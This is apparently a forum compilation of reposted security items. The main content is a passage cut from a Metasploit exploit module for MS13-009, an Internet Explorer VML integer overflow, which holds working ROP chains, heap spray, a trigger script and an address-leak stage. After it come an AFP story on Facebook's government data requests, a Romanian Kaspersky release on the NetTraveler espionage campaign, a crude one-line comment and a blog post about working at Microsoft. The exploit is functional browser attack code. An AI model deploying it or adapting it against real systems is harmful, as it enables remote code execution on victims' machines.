heap_obj.alloc(block); } | js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end return js end def get_ntdll_rop case @ntdll_version when "6.1.7601.17514" stack_pivot = [ @ntdll_base+0x0001578a, # ret # from ntdll @ntdll_base+0x000096c9, # pop ebx # ret # from ntdll @ntdll_base+0x00015789, # xchg eax, esp # ret from ntdll ].pack("V*") ntdll_rop = [ @ntdll_base+0x45F18, # ntdll!ZwProtectVirtualMemory 0x0c0c0c40, # ret to shellcode 0xffffffff, # ProcessHandle 0x0c0c0c34, # ptr to BaseAddress 0x0c0c0c38, # ptr to NumberOfBytesToProtect 0x00000040, # NewAccessProtection 0x0c0c0c3c, # ptr to OldAccessProtection 0x0c0c0c40, # BaseAddress 0x00000400, # NumberOfBytesToProtect 0x41414141 # OldAccessProtection ].pack("V*") return stack_pivot + ntdll_rop when "6.1.7601.17725" stack_pivot = [ @ntdll_base+0x0001579a, # ret # from ntdll @ntdll_base+0x000096c9, # pop ebx # ret # from ntdll @ntdll_base+0x00015799, # xchg eax, esp # ret from ntdll ].pack("V*") ntdll_rop = [ @ntdll_base+0x45F18, # ntdll!ZwProtectVirtualMemory 0x0c0c0c40, # ret to shellcode 0xffffffff, # ProcessHandle 0x0c0c0c34, # ptr to BaseAddress 0x0c0c0c38, # ptr to NumberOfBytesToProtect 0x00000040, # NewAccessProtection 0x0c0c0c3c, # ptr to OldAccessProtection 0x0c0c0c40, # BaseAddress 0x00000400, # NumberOfBytesToProtect 0x41414141 # OldAccessProtection ].pack("V*") return stack_pivot + ntdll_rop else return "" end end def get_payload(t, cli) code = payload.encoded # No rop. Just return the payload. return code if t['Rop'].nil? # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :jre print_status("Using JRE ROP") stack_pivot = [ 0x7c348b06, # ret # from msvcr71 0x7c341748, # pop ebx # ret # from msvcr71 0x7c348b05 # xchg eax, esp # ret from msvcr71 ].pack("V*") rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) when :ntdll print_status("Using ntdll ROP") rop_payload = get_ntdll_rop + payload.encoded end return rop_payload end def load_exploit_html(my_target, cli) p = get_payload(my_target, cli) js = ie_heap_spray(my_target, p) js_trigger = %Q| var rect_array = new Array() var a = new Array() function createRects(){ for(var i=0; i<0x1000; i++){ rect_array[i] = document.createElement("v:shape") rect_array[i].id = "rect" + i.toString() document.body.appendChild(rect_array[i]) } } function exploit(){ var vml1 = document.getElementById("vml1") for (var i=0; i<0x1000; i++){ a[i] = document.getElementById("rect" + i.toString())._anchorRect; if (i == 0x800) { vml1.dashstyle = "1 2 3 4" } } vml1.dashstyle.array.length = 0 - 1; vml1.dashstyle.array.item(6) = 0x0c0c0c0c; for (var i=0; i<0x1000; i++) { delete a[i]; CollectGarbage(); } location.reload(); } | create_rects_func = "createRects" exploit_func = "exploit" if datastore['OBFUSCATE'] js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger) js_trigger.obfuscate create_rects_func = js_trigger.sym("createRects") exploit_func = js_trigger.sym("exploit") end html = %Q| <html> <head> <script> #{js} </script> <meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" > </head> <title> </title> <style>v\\: * { behavior:url(#default#VML); display:inline-block }</style> <xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" /> <script> #{js_trigger} </script> <body onload="#{create_rects_func}(); #{exploit_func}();"> <v:oval> <v:stroke id="vml1"/> </v:oval> </body> </html> | return html end def html_info_leak js_trigger = %Q| var rect_array = new Array() var a = new Array() function createRects(){ for(var i=0; i<0x400; i++){ rect_array[i] = document.createElement("v:shape") rect_array[i].id = "rect" + i.toString() document.body.appendChild(rect_array[i]) } } function exploit(){ var vml1 = document.getElementById("vml1") for (var i=0; i<0x400; i++){ a[i] = document.getElementById("rect" + i.toString())._vgRuntimeStyle; } for (var i=0; i<0x400; i++){ a[i].rotation; if (i == 0x300) { vml1.dashstyle = "1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44" } } var length_orig = vml1.dashstyle.array.length; vml1.dashstyle.array.length = 0 - 1; for (var i=0; i<0x400; i++) { a[i].marginLeft = "a"; marginLeftAddress = vml1.dashstyle.array.item(0x2E+0x16); if (marginLeftAddress > 0) { vml1.dashstyle.array.item(0x2E+0x16) = 0x7ffe0300; var leak = a[i].marginLeft; vml1.dashstyle.array.item(0x2E+0x16) = marginLeftAddress; vml1.dashstyle.array.length = length_orig; document.location = "#{get_resource}/#{@second_stage_url}" + "?#{@leak_param}=" + parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 ) return; } } } | create_rects_func = "createRects" exploit_func = "exploit" if datastore['OBFUSCATE'] js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger) js_trigger.obfuscate create_rects_func = js_trigger.sym("createRects") exploit_func = js_trigger.sym("exploit") end html = %Q| <html> <head> <meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" > </head> <title> </title> <style>v\\: * { behavior:url(#default#VML); display:inline-block }</style> <xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" /> <script> #{js_trigger} </script> <body onload="#{create_rects_func}(); #{exploit_func}();"> <v:oval> <v:stroke id="vml1"/> </v:oval> </body> </html> | return html end def on_request_uri(cli, request) agent = request.headers['User-Agent'] uri = request.uri print_status("Requesting: #{uri}") my_target = get_target(agent) # Avoid the attack if no suitable target found if my_target.nil? print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end if my_target['Rop'] == :ntdll and request.uri !~ /#{@second_stage_url}/ html = html_info_leak html = html.gsub(/^\t\t/, '') print_status("Sending HTML to info leak...") send_response(cli, html, {'Content-Type'=>'text/html'}) else leak = begin request.uri_parts["QueryString"][@leak_param].to_i rescue 0 end if leak == 0 html = load_exploit_html(my_target, cli) html = html.gsub(/^\t\t/, '') print_status("Sending HTML to trigger...") send_response(cli, html, {'Content-Type'=>'text/html'}) return end vprint_status("ntdll leak: 0x#{leak.to_s(16)}") fingerprint = leak & 0x0000ffff case fingerprint when 0x70B0 @ntdll_version = "6.1.7601.17514" @ntdll_base = leak - 0x470B0 when 0x7090 @ntdll_version = "6.1.7601.17725" # MS12-001 @ntdll_base = leak - 0x47090 else print_error("ntdll version not detected, sending 404: #{agent}") send_not_found(cli) return end html = load_exploit_html(my_target, cli) html = html.gsub(/^\t\t/, '') print_status("Sending HTML to trigger...") send_response(cli, html, {'Content-Type'=>'text/html'}) end end end Sursa: MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow

[h=2]Facebook Reveals Details of US Data Requests[/h]By AFP on June 15, 2013 WASHINGTON - Facebook revealed Friday it received between 9,000 and 10,000 requests for user data from US authorities in the second half of last year, as it seeks to shield itself from a growing scandal. The requests covered issues from child disappearances to petty crimes and terror threats and targeted between 18,000 and 19,000 accounts, the social networking site said, without revealing how often it complied with the requests. Facebook "aggressively" protects its users' data, the company's general counsel Ted Ullyot said in a statement. "We frequently reject such requests outright, or require the government to substantially scale down its requests, or simply give the government much less data than it has requested. And we respond only as required by law," he added. Facebook is fighting an expanding public backlash after a government contractor revealed it was among nine Internet giants that turned over user data to the secret National Security Agency surveillance program PRISM. The companies, which also include Apple, Google, Microsoft and Yahoo, have denied claims the NSA could directly access their servers. US authorities have said the program helped prevent terror attacks. Facebook said it was able to report all US national security-related requests, which no company had previously been allowed to do, after pressing the government to release more details about the program. But, for now, it said the government would only allow Facebook to provide the numbers in aggregate form and as a range. "This is progress, but we're continuing to push for even more transparency, so that our users around the world can understand how infrequently we are asked to provide user data on national security grounds," Ullyot said. Google asked the FBI and US Justice Department this week for permission to release numbers related to its handing over of data for the leaked surveillance programs, saying it has "nothing to hide." The company's "transparency report" on government requests does not include national security requests under the Foreign Intelligence Surveillance Act (FISA) that authorized PRISM. In a statement Friday, a Google spokesperson said the company has "always believed it's important to differentiate between different types of government requests," adding that it wants to "publish aggregate numbers of national security requests, including FISA disclosures, separately." Leaker Edward Snowden, who worked as a subcontractor handling computer networks for the NSA, is in Hong Kong, a semi-autonomous Chinese territory, where he has vowed to contest any possible extradition in court. He also revealed the NSA's gathering of a huge trove of telephone metadata. US authorities said they could not mine the logs to target a specific user without authorization from a secret court. Sursa: Facebook Reveals Details of US Data Requests | SecurityWeek.Com

[h=1]Kaspersky Lab a descoperit „Opera?iunea NetTraveler”, o campanie de spionaj cibernetic la nivel global care a avut ca ?inte organiza?ii guvernamentale ?i institute de cercetare[/h] Toolkit-ul malware NetTraveler a infectat 350 de victime importante, având ca scop supravegherea ?i furtul de date. Bucure?ti, 5 iunie 2013 - Echipa de exper?i a Kaspersky Lab a publicat un nou raport de cercetare cu privire la NetTraveler, o familie de programe malware utilizate in opera?iuni de tip Advanced Persistent Threat (APT) pentru a compromite cu succes peste 350 de victime foarte importante din 40 de ??ri diferite. Gruparea NetTraveler a infectat victime din numeroase organiza?ii, atât din sectorul public, cât ?i din cel privat, inclusiv institu?ii guvernamentale, ambasade, organiza?ii din industria de petrol ?i gaze, centre de cercetare, centre militare ?i organiza?ii de activi?ti. Potrivit raportului Kaspersky Lab, aceast? amenin?are este activ? înc? din 2004, îns? cel mai mare volum de activitate s-a înregistrat în perioada 2010 - 2013. Cele mai importante domenii de interes pentru gruparea de spionaj cibernetic NetTraveler au inclus recent explorarea spa?ial?, nanotehnologia, produc?ia de energie, energia nuclear?, tehnologia laser, medicina ?i comunica?iile. Metode de infectare: Atacatorii infectau sistemele victimelor trimi?ând e-mailuri de tip spear-phishing, care con?ineau ata?amente Microsoft Office echipate cu dou? vulnerabilit??i intens exploatate (CVE-2012-0158 ?i CVE-2010-3333). Chiar dac? Microsoft a lansat deja patch-uri pentru aceste vulnerabilit??i, ele sunt în continuare exploatate pe scar? larg? în atacuri targetate, dovedindu-se a fi eficiente. Titlurile ata?amentelor mali?ioase din e-mailurile de tip spear-phishing relev? eforturile grup?rii NetTraveler de a-?i adapta atacurile pentru a putea infecta ?intele foarte importante. Printre titlurile documentelor mali?ioase se num?r?: Army Cyber Security Policy 2013.doc Report - Asia Defense Spending Boom.doc Activity Details.doc His Holiness the Dalai Lama’s visit to Switzerland day 4 Freedom of Speech.doc Furtul ?i extragerea de informa?ii: În cadrul analizei Kaspersky Lab, echipa de exper?i a ob?inut jurnalele de infectare de pe diferite servere de comand? ?i de control (C&C) ale grup?rii NetTraveler. Serverele C&C erau utilizate pentru a instala un malware adi?ional pe dispozitivele infectate ?i pentru a extrage informa?iile furate. Exper?ii Kaspersky Lab au estimat cantitatea de informa?ii furate stocate pe serverele de comand? ?i de control ale NetTraveler ca fiind de peste 22 gigabytes. Datele sustrase de pe sistemele infectate au inclus list?ri ale fi?ierelor, loguri de taste ap?sate, dar ?i alte tipuri de fi?iere, cum ar fi PDF-uri, tabele Excel sau documente Word. În plus, toolkit-ul NetTraveler putea s? instaleze un malware suplimentar de tip backdoor creat pentru sustragerea datelor, care putea fi personalizat pentru a fura alte tipuri de informa?ii delicate, cum ar fi detalii de configurare pentru aplica?ii sau fi?iere de proiectare asistat? de calculator (CAD). Statistici ale infect?rii globale: Potrivit analizei Kaspersky Lab asupra serverelor de comand? ?i control ale grup?rii NetTraveler, au existat, în total, 350 de victime în 40 de ??ri diferite, inclusiv Statele Unite, Canada, Marea Britanie, Rusia, Chile, Maroc, Grecia, Belgia, Austria, Ucraina, Lituania, Belarus, Australia, Hong Kong, Japonia, China, Mongolia, Iran, Turcia, India, Pakistan, Coreea de Sud, Thailanda, Qatar, Kazakhstan ?i Iordania. Pe lâng? analiza datelor cu privire la centrele ce control ?i comand?, exper?ii Kaspersky Lab au folosit Kaspersky Security Network (KSN) pentru a identifica statistici suplimentare cu privire la infec?ie. Primele 10 ??ri dup? num?rul de victime detectate de KSN au fost Mongolia, urmat? de Rusia, India, Kazakhstan, Kyrgyzstan, China, Tajikistan, Coreea de Sud, Spania ?i Germania. Descoperiri suplimentare În timpul analizei Kaspersky Lab asupra NetTraveler, exper?ii companiei au identificat ?ase victime care au fost infectate atât de NetTraveler, cât ?i de Red October, o alt? opera?iune de spionaj cibernetic analizat? de Kaspersky Lab în luna ianuarie 2013. De?i nu a fost identificat? nicio leg?tur? direct? între atacatorii NetTraveler ?i actorii implica?i în opera?iunea Red October, faptul c? anumite victime au fost afectate de ambele campanii de spionaj cibernetic demonstreaz? c? aceste victime foarte importante sunt ?inta mai multor atacatori din cauz? c? informa?iile pe care le de?in sunt foarte valoroase. Raportul complet al analizei Kaspersky Lab, inclusiv indicatorii compromiterii, tehnicile de remediere ?i detaliile cu privire la opera?iunea NetTraveler cu toate componentele sale mali?ioase, este disponibil pe Securelist. Produsele Kaspersky Lab detecteaz? ?i neutralizeaz? programele mali?ioase ?i toate versiunile folosite de Toolkit–ul NetTraveler, inclusiv Trojan-Spy.Win32.TravNet ?i Downloader.Win32.NetTraveler. Produsele Kaspersky Lab detecteaz? exploit-urile Microsoft Office folosite în atacurile de tip spear-phishing, inclusiv Exploit.MSWord.CVE-2010-333, Exploit.Win32.CVE-2012-0158. # # # Despre Kaspersky Lab Kaspersky Lab este cel mai mare produc?tor privat de solu?ii de securitate endpoint din lume, fiind inclus în topul primilor patru produc?tori de solu?ii pentru protec?ie endpoint la nivel mondial*. Pe parcursul celor 15 ani de existen??, Kaspersky Lab a r?mas o companie inovatoare în domeniul securit??ii informatice ?i ofer? suite de protec?ie IT pentru utilizatori individuali, SMB ?i companii mari. Compania este prezent? în aproximativ 200 de ??ri ?i protejeaz? peste 300 de milioane de utilizatori din întreaga lume. Pentru mai multe informa?ii, vizita?i www.kaspersky.ro. Sursa: Kaspersky Lab a descoperit „Opera?iunea NetTraveler”, o campanie de spionaj cibernetic la nivel global care a avut ca ?inte organiza?ii guvernamentale ?i institute de cercetare | kaspersky.ro

"Cosul de gunoi" si "Cele mai penale posturi" nu sunt de ajuns, ne mai trebuie o categorie: "Cele mai de cacat posturi".

[h=1]8 months in Microsoft, I learned these [/h]07. June 2013 by Ahmet Alp Balkan Two years ago today, I started Microsoft Windows Azure as an intern, in the very same team I joined right after college and I am working for last 8 months. I decided to summarize a few points I learned so far in this job during last 8 months. This may sound like the way things work are crappy, it is not. I learned that one will see this sort of problems in all large scale companies. Most of them are not specific to Microsoft at all. Every company has its own problems. I am not saying that I am unhappy and not complaining. These are purely a few lessons I was not aware of in the college (expectations vs reality sort of article). Read on: Expect no documentation in corporations. I have seen the knowledge inside the company is mostly transferred by talking and hands-on sessions. Some parts of knowledge base generated are only emailed and not saved anywhere permanent. This is not how the information flows in the digital world. There are certain people, if they got hit by a bus, nobody can pick up their work or code. And it is okay. If this would have been my own company there would be tons of wiki pages. It is not what you do, it is what you sell. You can spend days making your codebase a better place, writing more robust code and fix others’ mistakes. As long as it does not have a big business impact and you can’t ship it, it means practically nothing. Nobody will appreciate you for fixing styling or architectural issues in their core, in fact they may get offended. That’s not something I realized when I was a student. Not everybody is passionate for engineering. You don’t always work with people passionate for creating wonderful software. Mostly, people have other things to do (e.g. family and kids) and writing better code is not a priority for the most. And it is okay. I learned not to expect enthusiasm from everybody. 2-3 hours of coding a day is great. Before taking the job, I was able to code 8-10 hours a day on my personal projects. Somehow in this environment it is almost impossible to get 2 hours straight of coding for me. I spend most of my time trying to figure out how others’ uncommented/undocumented code work, debugging strange things and attending daily meetings. Apparently it’s not just me and there can be days no single commits are pushed to the source control in a team. And it is okay. Not giving back to the public domain is a norm. I haven’t met almost any bloggers or open source developers in my organization dedicating some of their time to give back to the community. Everybody loves finding Stack Overflow answers on search results, but nobody contributes those answers. I can understand that. The world outside is not known here a lot. I bet you’re reading what sort of latest technologies and tools are out on blogs, Reddit or Hacker News every day. It’s not common here. I am surprised that no one I met in Windows Azure team heard about Heroku or Rackspace, which are direct competitors. That’s acceptable, not everybody has to know these. It is all about getting shit done in corporations. If your manager asks a button there doing that, nobody cares what sort of mess you created. As long as that functionality is ready, it is okay and can always be fixed later. (I haven’t seen that ever happened, yet.) In college, I learned code quality is as important as the result, turned out wrong. Copy-pasting code can be okay. If somebody sees you doing this outside the corporations, you’ll probably get punched in the face. I’ve seen source files copy pasted across projects. As long as it gets shit done (described above) no one cares if you produced unmaintainable code. Code reviews can be skipped, for the sake of agility. It’s part of the culture in my team, if you are messing with somebody else’s code, you’ll send code reviews. Otherwise it is usually not done and you may wait a lot of time and after a lot of pings to draw some attention, maybe somebody will respond. Latest software, meh. Not everybody is fond of latest versions here. Almost 90% of my colleagues use older versions of Office, Windows, Visual Studio and .NET Framework. There is a common belief that newer versions will break existing workflows. This might be the same reason why some enterprises still run all their software on Java 1.3-1.5. So, I learned not to expect latest software on environments. Your specialties usually do not matter. Thousands get hired every year out of college and usually randomly assigned to a team (which you can’t change for 1.5 years). It does not matter whether you have mastered MongoDB, created iOS apps, been an Apache committer, created your own networking library, designed user interfaces or bootstrapped your own startup. You are hired to do get something needed done. I was not expecting that. It’s hard to find a position in corporations matches what you love to do. At the end, you are working for your manager’s and their managers’ paychecks. I was not aware of this fact in college. (This post made it to the top of Hacker News and /r/programming. Thanks everyone for comments and support. There are over 1,000 comments on HN, Reddit and below, I did not have a chance to read them all, sorry if I missed yours.) Sursa: 8 months in Microsoft, I learned these | /home/alp